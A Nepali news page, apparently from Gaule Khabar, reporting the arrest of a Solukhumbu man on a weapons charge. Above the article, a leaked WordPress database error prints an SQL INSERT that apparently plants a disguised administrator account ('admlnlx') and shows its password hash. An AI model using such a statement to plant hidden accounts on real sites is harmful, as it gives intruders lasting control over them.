WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bey9RvCIiztYcv.mUdt5f9uAwSxgPZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 03:23:12', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुका एक युवक हातहतियार खरखजना कसुरमा पक्राउ – Gaule Khabar

सोलुखुम्बुका एक युवक हातहतियार खरखजना कसुरमा पक्राउ

सोलुखुम्बुका एक युवक हातहतियार खरखजना कसुरमा पक्राउ

काठमाण्डौं । सोलुखुम्बुको थुलुङ दुधकोशीबाट एक युवकलाई हातहतियार खरखजना कसुरमा पक्राउ गरिएको छ ।

थुलुङ दुधकोशी गाउँपालिका ७ देउसाका ३५ वर्षिय मिलन कुमार राईलाई गाउँबाटै पक्राउ गरिएको हो ।

महानगरिय प्रहरी बृत्त लैनचौरबाट पक्राउ पुर्जि जारी भएपछि सोलुखुम्बु प्रहरीले राईलाई पक्राउ गरेको हो । राईलाई काठमाण्डौ पठाइएको सोलुखुम्बुका प्रहरी निरीक्षक ऋषिराज ढकालले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका